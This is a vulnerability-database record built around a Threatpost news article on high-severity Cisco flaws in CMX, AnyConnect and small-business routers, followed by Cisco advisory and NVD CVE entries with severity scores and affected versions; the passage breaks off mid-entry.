{"id": "THREATPOST:30D70449EF03FFC5099B5B141FA079E2", "type": "threatpost", "bulletinFamily": "info", "title": "High-Severity Cisco Flaw Found in CMX Software For Retailers", "description": "A high-severity flaw in Cisco\u2019s smart Wi-Fi solution for retailers could allow a remote attacker to alter the password of any account user on affected systems.\n\nThe vulnerability is part of a number of patches issued by Cisco addressing 67 high-severity CVEs on Wednesday. This included flaws found in Cisco\u2019s AnyConnect Secure Mobility Client, as well as Cisco RV110W, RV130, RV130W, and RV215W small business routers.\n\nThe most serious flaw afflicts Cisco Connected Mobile Experiences (CMX), [a software solution](<https://developer.cisco.com/site/cmx-mobility-services/>) that is utilized by retailers to provide business insights or on-site customer experience analytics. The solution uses the Cisco wireless infrastructure to collect a treasure trove of data from the retailer\u2019s Wi-Fi network, including real-time customer-location tracking.\n\n[](<https://threatpost.com/2020-reader-survey/161168/>)\n\nFor instance, if a customer connects to the Wi-Fi network of a store that utilizes CMX, retailers can track their locations within the venue, observe their behavior, and deliver special offers or promotions to them-while they\u2019re there.\n\nThe vulnerability (CVE-2021-1144) is [due to incorrect handling of authorization checks](<https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-cmxpe-75Asy9k>) for changing a password. The flaw ranks 8.8 out of 10 on the CVSS vulnerability-severity scale, making it high severity. Of note, to exploit the flaw, an attacker must have an authenticated CMX account \u2013 but would not need administrative privileges.\n\n\u201cAn authenticated attacker without administrative privileges could exploit this vulnerability by sending a modified HTTP request to an affected device,\u201d said Cisco. \u201cA successful exploit could allow the attacker to alter the passwords of any user on the system, including an administrative user, and then impersonate that user.\u201d\n\nAdmins have a [variety of privileges](<https://www.cisco.com/c/en/us/td/docs/wireless/mse/10-4/cmx_config/b_cg_cmx104/performing_administrative_tasks.html#concept_AF709E7ABE064E73B8C052BD9EB0FD1A>), including the ability to use File Transfer Protocol (FTP) commands for backing up and restoring data on Cisco CMX and gaining access to credentials (in order to unlock users who have been locked out of their accounts).\n\nThis vulnerability affects Cisco CMX releases 10.6.0, 10.6.1, and 10.6.2; the issue is patched in Cisco CMX releases 10.6.3 and later.\n\n## **Other High-Severity Flaws**\n\n[Another high-severity flaw](<https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-anyconnect-dll-injec-pQnryXLf>) (CVE-2021-1237) exists in the Cisco AnyConnect Secure Mobility Client for Windows. AnyConnect Secure Mobility Client, a modular endpoint software product, provides a wide range of security services (such as remote access, web security features and roaming protection) for endpoints.\n\nThe flaw allows attackers \u2013 if they are authenticated and local \u2013 to perform a dynamic-link library (DLL) injection attack. To exploit this vulnerability, the attacker would need to have valid credentials on the Windows system, Cisco said.\n\n\u201cAn attacker could exploit this vulnerability by inserting a configuration file in a specific path in the system which, in turn, causes a malicious DLL file to be loaded when the application starts,\u201d according to Cisco. \u201cA successful exploit could allow the attacker to execute arbitrary code on the affected machine with system privileges.\u201d\n\nSixty of those CVEs [exist in in the web-based management interface](<https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-rv-overflow-WUnUgv4U>) of Cisco Small Business RV110W, RV130, RV130W and RV215W routers. These flaws could allow an authenticated, remote attacker to execute arbitrary code or cause an affected device to restart unexpectedly.\n\n\u201cAn attacker could exploit these vulnerabilities by sending crafted HTTP requests to an affected device,\u201d according to Cisco. \u201cA successful exploit could allow the attacker to execute arbitrary code as the root user on the underlying operating system or cause the device to reload, resulting in a denial-of-service (DoS) condition.\u201d\n\nAnd, five more CVEs (CVE-2021-1146, CVE-2021-1147, CVE-2021-1148, CVE-2021-1149 and CVE-2021-1150) in the Cisco Small Business RV110W, RV130, RV130W, and RV215W routers [could allow an authenticated, remote attacker](<https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-rv-command-inject-LBdQ2KRN>) to inject arbitrary commands that are executed with root privileges.\n\nOf note, Cisco said it would not release software updates for the Cisco Small Business RV110W, RV130, RV130W and RV215W routers, as they have reached end of life.\n\n\u201cCisco has not released and will not release software updates to address the vulnerabilities described in this advisory,\u201d according to Cisco. \u201cThe Cisco Small Business RV110W, RV130, RV130W, and RV215W Routers have entered the end-of-life process.\u201d\n\n**Supply-Chain Security: A 10-Point Audit Webinar:** _Is your company\u2019s software supply-chain prepared for an attack? On Wed., Jan. 20 at 2p.m. ET, start identifying weaknesses in your supply-chain with actionable advice from experts \u2013 part of a [limited-engagement and LIVE Threatpost webinar](<https://threatpost.com/webinars/supply-chain-security-a-10-point-audit/?utm_source=ART&utm_medium=ART&utm_campaign=Jan_webinar>). CISOs, AppDev and SysAdmin are invited to ask a panel of A-list cybersecurity experts how they can avoid being caught exposed in a post-SolarWinds-hack world. Attendance is limited: **[Register Now](<https://threatpost.com/webinars/supply-chain-security-a-10-point-audit/?utm_source=ART&utm_medium=ART&utm_campaign=Jan_webinar>)** and reserve a spot for this exclusive Threatpost [Supply-Chain Security webinar](<https://threatpost.com/webinars/supply-chain-security-a-10-point-audit/?utm_source=ART&utm_medium=ART&utm_campaign=Jan_webinar>) \u2013 Jan. 20, 2 p.m. ET._\n", "published": "2021-01-13T21:22:01", "modified": "2021-01-13T21:22:01", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "href": "https://threatpost.com/cisco-flaw-cmx-software-retailers/163027/", "reporter": "Lindsey O'Donnell", "references": ["https://developer.cisco.com/site/cmx-mobility-services/", "https://threatpost.com/2020-reader-survey/161168/", "https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-cmxpe-75Asy9k", "https://www.cisco.com/c/en/us/td/docs/wireless/mse/10-4/cmx_config/b_cg_cmx104/performing_administrative_tasks.html#concept_AF709E7ABE064E73B8C052BD9EB0FD1A", "https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-anyconnect-dll-injec-pQnryXLf", "https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-rv-overflow-WUnUgv4U", "https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-rv-command-inject-LBdQ2KRN", "https://threatpost.com/webinars/supply-chain-security-a-10-point-audit/?utm_source=ART&utm_medium=ART&utm_campaign=Jan_webinar", "https://threatpost.com/webinars/supply-chain-security-a-10-point-audit/?utm_source=ART&utm_medium=ART&utm_campaign=Jan_webinar", "https://threatpost.com/webinars/supply-chain-security-a-10-point-audit/?utm_source=ART&utm_medium=ART&utm_campaign=Jan_webinar"], "cvelist": ["CVE-2020-1472", "CVE-2021-1144", "CVE-2021-1146", "CVE-2021-1147", "CVE-2021-1148", "CVE-2021-1149", "CVE-2021-1150", "CVE-2021-1237"], "lastseen": "2021-01-15T21:53:22", "viewCount": 46, "enchantments": {"dependencies": {"references": [{"type": "cisco", "idList": ["CISCO-SA-RV-OVERFLOW-WUNUGV4U", "CISCO-SA-ANYCONNECT-DLL-INJEC-PQNRYXLF", "CISCO-SA-CMXPE-75ASY9K", "CISCO-SA-RV-COMMAND-INJECT-LBDQ2KRN"]}, {"type": "cve", "idList": ["CVE-2021-1148", "CVE-2021-1149", "CVE-2020-1472", "CVE-2021-1144", "CVE-2021-1237", "CVE-2021-1147", "CVE-2021-1150", "CVE-2021-1146"]}, {"type": "attackerkb", "idList": ["AKB:7C5703D3-9E18-4F5C-A4D2-25E1F09B43CB", "AKB:024E1B87-5E35-4D1D-BE39-A370F2954FC1"]}, {"type": "msrc", "idList": ["MSRC:96F2FB0D77EED0ABDED8EBD64AEBEA09", "MSRC:5B84BD451283462DC81D4090EFE66280"]}, {"type": "cisa", "idList": ["CISA:7E93687DEED7F2EA7EFAEBA997B30A5D", "CISA:61F2653EF56231DB3AEC3A9E938133FE", "CISA:990FCFCEB1D9B60F5FAA47A1F537A3CB", "CISA:2B970469D89016F563E142BE209443D8", "CISA:7FB0A467C0EB89B6198A58418B43D50C", "CISA:E5A33B5356175BB63C2EFA605346F8C7", "CISA:433F588AAEF2DF2A0B46FE60687F19E0"]}, {"type": "rapid7blog", "idList": ["RAPID7BLOG:C628D3D68DF3AE5A40A1F0C9DFA38860", "RAPID7BLOG:486F801929E1F794197FC08AE13E4CB5", "RAPID7BLOG:0C3EDBDC537092A20C850F762D5A5856"]}, {"type": "pentestpartners", "idList": ["PENTESTPARTNERS:8FD1C9A0D76A3084445136A0275847C0"]}, {"type": "qualysblog", "idList": ["QUALYSBLOG:192411B44569225E2F2632594DC4308C"]}, {"type": "nessus", "idList": ["OPENSUSE-2020-1526.NASL", "SUSE_SU-2020-2722-1.NASL", "UBUNTU_USN-4559-1.NASL", "CISCO-SA-ANYCONNECT-DLL-INJEC-PQNRYXLF.NASL", "SUSE_SU-2020-2721-1.NASL", "SUSE_SU-2020-2730-1.NASL", "SUSE_SU-2020-2720-1.NASL", "EULEROS_SA-2020-2181.NASL", "OPENSUSE-2020-1513.NASL", "EULEROS_SA-2020-2171.NASL"]}, {"type": "freebsd", "idList": ["24ACE516-FAD7-11EA-8D8C-005056A311D1"]}, {"type": "talosblog", "idList": ["TALOSBLOG:A654303FB4331FDBB91B999EC882BE7A"]}, {"type": "threatpost", "idList": ["THREATPOST:45F91A2DD716E93AA4DA0D9441E725C6", "THREATPOST:A47D83D4BBBE115E6424755328525B9D", "THREATPOST:2F655C93B7912A7C776E1DC1D39822D0", "THREATPOST:BF4F0F3E3CEFCA14433C331F5D6493E2", "THREATPOST:F60D403369A535076F39A474F74C925E", "THREATPOST:BBAE8AE32C2E8EC0271BBA9D0498A825", "THREATPOST:A5FC4C5797CA53E30A3426AF0843BFFE", "THREATPOST:870C912F079364DE3A8DADFDBE4E42D1", "THREATPOST:F1065D29808C9165285986CCB6DEBB5A", "THREATPOST:27150C099FB4771B9DED4F6372D27EB7", "THREATPOST:6B7259AD7487C6D17E0A301E14AEB7CB"]}, {"type": "carbonblack", "idList": ["CARBONBLACK:A526657711947788A54505B0330C16A0", "CARBONBLACK:91F55D2B8B2999589579EACB1542A3E9", "CARBONBLACK:19B4E04F8F1723A4F28FA7A8354698AF"]}, {"type": "ubuntu", "idList": ["USN-4559-1", "USN-4510-2", "USN-4510-1"]}, {"type": "archlinux", "idList": ["ASA-202009-17"]}, {"type": "fedora", "idList": ["FEDORA:38D8230C58CD", "FEDORA:4A64830CFCDC", "FEDORA:D8A0E3053060"]}, {"type": "krebs", "idList": ["KREBS:952ACEBFD55EBD076910C6B233491883"]}, {"type": "trendmicroblog", "idList": ["TRENDMICROBLOG:8A87E8F1BA63B9BB2E84C23288C44FDC"]}, {"type": "thn", "idList": ["THN:F4928090525451C50A1B016ED3B0650F", "THN:F53D18B9EB0F8CD70C9289288AC9E2E1"]}, {"type": "huawei", "idList": ["HUAWEI-SA-20201105-01-NETLOGON"]}, {"type": "securelist", "idList": ["SECURELIST:847981DCB9E90C51F963EE1727E40915"]}, {"type": "mscve", "idList": ["MS:CVE-2020-1472"]}, {"type": "malwarebytes", "idList": ["MALWAREBYTES:78E91E28F51B0A15B6CA53FF8A9B480B"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:160127"]}, {"type": "fireeye", "idList": ["FIREEYE:D64714BFF80E34308579150D4C839557"]}, {"type": "suse", "idList": ["OPENSUSE-SU-2020:1513-1", "OPENSUSE-SU-2020:1526-1"]}, {"type": "cert", "idList": ["VU:490028"]}, {"type": "samba", "idList": ["SAMBA:CVE-2020-1472"]}, {"type": "exploitdb", "idList": ["EDB-ID:49071"]}, {"type": "centos", "idList": ["CESA-2020:5439"]}, {"type": "amazon", "idList": ["ALAS-2021-1469", "ALAS2-2021-1585"]}, {"type": "mmpc", "idList": ["MMPC:D6D537E875C3CBD84822A868D24B31BA"]}, {"type": "oraclelinux", "idList": ["ELSA-2020-5439"]}], "modified": "2021-01-15T21:53:22", "rev": 2}, "score": {"value": 5.7, "vector": "NONE", "modified": "2021-01-15T21:53:22", "rev": 2}, "vulnersScore": 5.7}}

{"cisco": [{"lastseen": "2021-01-13T16:27:04", "bulletinFamily": "software", "cvelist": ["CVE-2021-1146", "CVE-2021-1147", "CVE-2021-1148", "CVE-2021-1149", "CVE-2021-1150"], "description": "Multiple vulnerabilities in the web-based management interface of Cisco Small Business RV110W, RV130, RV130W, and RV215W Routers could allow an authenticated, remote attacker to inject arbitrary commands that are executed with root privileges.\n\nThe vulnerabilities are due to improper validation of user-supplied input in the web-based management interface. An attacker could exploit these vulnerabilities by sending crafted HTTP requests to a targeted device. A successful exploit could allow the attacker to execute arbitrary code as the root user on the underlying operating system. To exploit these vulnerabilities, an attacker would need to have valid administrator credentials on an affected device.\n\nCisco has not released software updates that address these vulnerabilities. There are no workarounds that address these vulnerabilities.\n\nThis advisory is available at the following link:\nhttps://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-rv-command-inject-LBdQ2KRN [\"https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-rv-command-inject-LBdQ2KRN\"]", "modified": "2021-01-13T16:00:00", "published": "2021-01-13T16:00:00", "id": "CISCO-SA-RV-COMMAND-INJECT-LBDQ2KRN", "href": "https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-rv-command-inject-LBdQ2KRN", "type": "cisco", "title": "Cisco Small Business RV110W, RV130, RV130W, and RV215W Routers Management Interface Command Injection Vulnerabilities", "cvss": {"score": 7.2, "vector": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H"}}, {"lastseen": "2021-01-13T16:27:04", "bulletinFamily": "software", "cvelist": ["CVE-2021-1144"], "description": "A vulnerability in Cisco Connected Mobile Experiences (CMX) could allow a remote, authenticated attacker without administrative privileges to alter the password of any user on an affected system.\n\nThe vulnerability is due to incorrect handling of authorization checks for changing a password. An authenticated attacker without administrative privileges could exploit this vulnerability by sending a modified HTTP request to an affected device. A successful exploit could allow the attacker to alter the passwords of any user on the system, including an administrative user, and then impersonate that user.\n\nCisco has released software updates that address this vulnerability. There are no workarounds that address this vulnerability.\n\nThis advisory is available at the following link:\nhttps://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-cmxpe-75Asy9k [\"https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-cmxpe-75Asy9k\"]", "modified": "2021-01-13T16:00:00", "published": "2021-01-13T16:00:00", "id": "CISCO-SA-CMXPE-75ASY9K", "href": "https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-cmxpe-75Asy9k", "type": "cisco", "title": "Cisco Connected Mobile Experiences Privilege Escalation Vulnerability", "cvss": {"score": 8.8, "vector": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H"}}, {"lastseen": "2021-01-14T16:26:59", "bulletinFamily": "software", "cvelist": ["CVE-2021-1237"], "description": "A vulnerability in the Network Access Manager and Web Security Agent components of Cisco AnyConnect Secure Mobility Client for Windows could allow an authenticated, local attacker to perform a DLL injection attack. To exploit this vulnerability, the attacker would need to have valid credentials on the Windows system.\n\nThe vulnerability is due to insufficient validation of resources that are loaded by the application at run time. An attacker could exploit this vulnerability by inserting a configuration file in a specific path in the system which, in turn, causes a malicious DLL file to be loaded when the application starts. A successful exploit could allow the attacker to execute arbitrary code on the affected machine with SYSTEM privileges.\n\nCisco has released software updates that address this vulnerability. There are no workarounds that address this vulnerability.\n\nThis advisory is available at the following link:\nhttps://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-anyconnect-dll-injec-pQnryXLf [\"https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-anyconnect-dll-injec-pQnryXLf\"]", "modified": "2021-01-14T15:20:06", "published": "2021-01-13T16:00:00", "id": "CISCO-SA-ANYCONNECT-DLL-INJEC-PQNRYXLF", "href": "https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-anyconnect-dll-injec-pQnryXLf", "type": "cisco", "title": "Cisco AnyConnect Secure Mobility Client for Windows DLL Injection Vulnerability", "cvss": {"score": 7.8, "vector": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H"}}], "cve": [{"lastseen": "2021-02-02T07:55:04", "description": "Multiple vulnerabilities in the web-based management interface of Cisco Small Business RV110W, RV130, RV130W, and RV215W Routers could allow an authenticated, remote attacker to inject arbitrary commands that are executed with root privileges. The vulnerabilities are due to improper validation of user-supplied input in the web-based management interface. An attacker could exploit these vulnerabilities by sending crafted HTTP requests to a targeted device. A successful exploit could allow the attacker to execute arbitrary code as the root user on the underlying operating system. To exploit these vulnerabilities, an attacker would need to have valid administrator credentials on an affected device. Cisco has not released software updates that address these vulnerabilities.", "edition": 4, "cvss3": {"exploitabilityScore": 1.2, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 7.2, "privilegesRequired": "HIGH", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-01-13T22:15:00", "title": "CVE-2021-1149", "type": "cve", "cwe": ["CWE-77"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.0, "vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-1149"], "modified": "2021-01-15T15:57:00", "cpe": ["cpe:/o:cisco:rv215w_wireless-n_vpn_router_firmware:1.2.2.8", "cpe:/o:cisco:rv130w_firmware:1.2.2.8", "cpe:/o:cisco:rv130w_firmware:1.3.1.7", "cpe:/a:cisco:application_extension_platform:1.0.3.55", "cpe:/o:cisco:rv215w_wireless-n_vpn_router_firmware:1.3.1.7", "cpe:/o:cisco:rv110w_firmware:1.2.2.8", "cpe:/o:cisco:rv130_vpn_router_firmware:1.3.1.7", "cpe:/o:cisco:rv110w_firmware:1.3.1.7", "cpe:/o:cisco:rv130_vpn_router_firmware:1.2.2.8"], "id": "CVE-2021-1149", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2021-1149", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}, "cpe23": ["cpe:2.3:o:cisco:rv110w_firmware:1.3.1.7:*:*:*:*:*:*:*", "cpe:2.3:o:cisco:rv130_vpn_router_firmware:1.2.2.8:*:*:*:*:*:*:*", "cpe:2.3:a:cisco:application_extension_platform:1.0.3.55:*:*:*:*:*:*:*", "cpe:2.3:o:cisco:rv130_vpn_router_firmware:1.3.1.7:*:*:*:*:*:*:*", "cpe:2.3:o:cisco:rv215w_wireless-n_vpn_router_firmware:1.2.2.8:*:*:*:*:*:*:*", "cpe:2.3:o:cisco:rv110w_firmware:1.2.2.8:*:*:*:*:*:*:*", "cpe:2.3:o:cisco:rv130w_firmware:1.3.1.7:*:*:*:*:*:*:*", "cpe:2.3:o:cisco:rv130w_firmware:1.2.2.8:*:*:*:*:*:*:*", "cpe:2.3:o:cisco:rv215w_wireless-n_vpn_router_firmware:1.3.1.7:*:*:*:*:*:*:*"]}, {"lastseen": "2021-02-02T07:55:04", "description": "A vulnerability in Cisco Connected Mobile Experiences (CMX) could allow a remote, authenticated attacker without administrative privileges to alter the password of any user on an affected system. The vulnerability is due to incorrect handling of authorization checks for changing a password. An authenticated attacker without administrative privileges could exploit this vulnerability by sending a modified HTTP request to an affected device. A successful exploit could allow the attacker to alter the passwords of any user on the system, including an administrative user, and then impersonate that user.", "edition": 4, "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 8.8, "privilegesRequired": "LOW", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-01-13T22:15:00", "title": "CVE-2021-1144", "type": "cve", "cwe": ["CWE-863"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.5, "vectorString": "AV:N/AC:L/Au:S/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-1144"], "modified": "2021-01-20T17:35:00", "cpe": ["cpe:/a:cisco:connected_mobile_experiences:10.6.0", "cpe:/a:cisco:connected_mobile_experiences:10.6.2", "cpe:/a:cisco:connected_mobile_experiences:10.6.1"], "id": "CVE-2021-1144", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2021-1144", "cvss": {"score": 6.5, "vector": "AV:N/AC:L/Au:S/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:a:cisco:connected_mobile_experiences:10.6.1:*:*:*:*:*:*:*", "cpe:2.3:a:cisco:connected_mobile_experiences:10.6.0:*:*:*:*:*:*:*", "cpe:2.3:a:cisco:connected_mobile_experiences:10.6.2:*:*:*:*:*:*:*"]}, {"lastseen": "2021-02-02T07:55:04", "description": "Multiple vulnerabilities in the web-based management interface of Cisco Small Business RV110W, RV130, RV130W, and RV215W Routers could allow an authenticated, remote attacker to inject arbitrary commands that are executed with root privileges. The vulnerabilities are due to improper validation of user-supplied input in the web-based management interface. An attacker could exploit these vulnerabilities by sending crafted HTTP requests to a targeted device. A successful exploit could allow the attacker to execute arbitrary code as the root user on the underlying operating system. To exploit these vulnerabilities, an attacker would need to have valid administrator credentials on an affected device. Cisco has not released software updates that address these vulnerabilities.", "edition": 4, "cvss3": {"exploitabilityScore": 1.2, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 7.2, "privilegesRequired": "HIGH", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-01-13T22:15:00", "title": "CVE-2021-1147", "type": "cve", "cwe": ["CWE-77"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.0, "vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-1147"], "modified": "2021-01-15T15:52:00", "cpe": ["cpe:/o:cisco:rv215w_wireless-n_vpn_router_firmware:1.2.2.8", "cpe:/o:cisco:rv130w_firmware:1.2.2.8", "cpe:/o:cisco:rv130w_firmware:1.3.1.7", "cpe:/a:cisco:application_extension_platform:1.0.3.55", "cpe:/o:cisco:rv215w_wireless-n_vpn_router_firmware:1.3.1.7", "cpe:/o:cisco:rv110w_firmware:1.2.2.8", "cpe:/o:cisco:rv130_vpn_router_firmware:1.3.1.7", "cpe:/o:cisco:rv110w_firmware:1.3.1.7", "cpe:/o:cisco:rv130_vpn_router_firmware:1.2.2.8"], "id": "CVE-2021-1147", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2021-1147", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}, "cpe23": ["cpe:2.3:o:cisco:rv110w_firmware:1.3.1.7:*:*:*:*:*:*:*", "cpe:2.3:o:cisco:rv130_vpn_router_firmware:1.2.2.8:*:*:*:*:*:*:*", "cpe:2.3:a:cisco:application_extension_platform:1.0.3.55:*:*:*:*:*:*:*", "cpe:2.3:o:cisco:rv130_vpn_router_firmware:1.3.1.7:*:*:*:*:*:*:*", "cpe:2.3:o:cisco:rv215w_wireless-n_vpn_router_firmware:1.2.2.8:*:*:*:*:*:*:*", "cpe:2.3:o:cisco:rv110w_firmware:1.2.2.8:*:*:*:*:*:*:*", "cpe:2.3:o:cisco:rv130w_firmware:1.3.1.7:*:*:*:*:*:*:*", "cpe:2.3:o:cisco:rv130w_firmware:1.2.2.8:*:*:*:*:*:*:*", "cpe:2.3:o:cisco:rv215w_wireless-n_vpn_router_firmware:1.3.1.7:*:*:*:*:*:*:*"]}, {"lastseen": "2021-02-02T07:55:04", "description": "Multiple vulnerabilities in the web-based management interface of Cisco Small Business RV110W, RV130, RV130W, and RV215W Routers could allow an authenticated, remote attacker to inject arbitrary commands that are executed with root privileges. The vulnerabilities are due to improper validation of user-supplied input in the web-based management interface. An attacker could exploit these vulnerabilities by sending crafted HTTP requests to a targeted device. A successful exploit could allow the attacker to execute arbitrary code as the root user on the underlying operating system. To exploit these vulnerabilities, an attacker would need to have valid administrator credentials on an affected device. Cisco has not released software updates that address these vulnerabilities.", "edition": 4, "cvss3": {"exploitabilityScore": 1.2, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 7.2, "privilegesRequired": "HIGH", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-01-13T22:15:00", "title": "CVE-2021-1150", "type": "cve", "cwe": ["CWE-77"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.0, "vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-1150"], "modified": "2021-01-15T15:57:00", "cpe": ["cpe:/o:cisco:rv215w_wireless-n_vpn_router_firmware:1.2.2.8", "cpe:/o:cisco:rv130w_firmware:1.2.2.8", "cpe:/o:cisco:rv130w_firmware:1.3.1.7", "cpe:/a:cisco:application_extension_platform:1.0.3.55", "cpe:/o:cisco:rv215w_wireless-n_vpn_router_firmware:1.3.1.7", "cpe:/o:cisco:rv110w_firmware:1.2.2.8", "cpe:/o:cisco:rv130_vpn_router_firmware:1.3.1.7", "cpe:/o:cisco:rv110w_firmware:1.3.1.7", "cpe:/o:cisco:rv130_vpn_router_firmware:1.2.2.8"], "id": "CVE-2021-1150", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2021-1150", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}, "cpe23": ["cpe:2.3:o:cisco:rv110w_firmware:1.3.1.7:*:*:*:*:*:*:*", "cpe:2.3:o:cisco:rv130_vpn_router_firmware:1.2.2.8:*:*:*:*:*:*:*", "cpe:2.3:a:cisco:application_extension_platform:1.0.3.55:*:*:*:*:*:*:*", "cpe:2.3:o:cisco:rv130_vpn_router_firmware:1.3.1.7:*:*:*:*:*:*:*", "cpe:2.3:o:cisco:rv215w_wireless-n_vpn_router_firmware:1.2.2.8:*:*:*:*:*:*:*", "cpe:2.3:o:cisco:rv110w_firmware:1.2.2.8:*:*:*:*:*:*:*", "cpe:2.3:o:cisco:rv130w_firmware:1.3.1.7:*:*:*:*:*:*:*", "cpe:2.3:o:cisco:rv130w_firmware:1.2.2.8:*:*:*:*:*:*:*", "cpe:2.3:o:cisco:rv215w_wireless-n_vpn_router_firmware:1.3.1.7:*:*:*:*:*:*:*"]}, {"lastseen": "2021-02-02T07:55:04", "description": "Multiple vulnerabilities in the web-based management interface of Cisco Small Business RV110W, RV130, RV130W, and RV215W Routers could allow an authenticated, remote attacker to inject arbitrary commands that are executed with root privileges. The vulnerabilities are due to improper validation of user-supplied input in the web-based management interface. An attacker could exploit these vulnerabilities by sending crafted HTTP requests to a targeted device. A successful exploit could allow the attacker to execute arbitrary code as the root user on the underlying operating system. To exploit these vulnerabilities, an attacker would need to have valid administrator credentials on an affected device. Cisco has not released software updates that address these vulnerabilities.", "edition": 4, "cvss3": {"exploitabilityScore": 1.2, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 7.2, "privilegesRequired": "HIGH", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 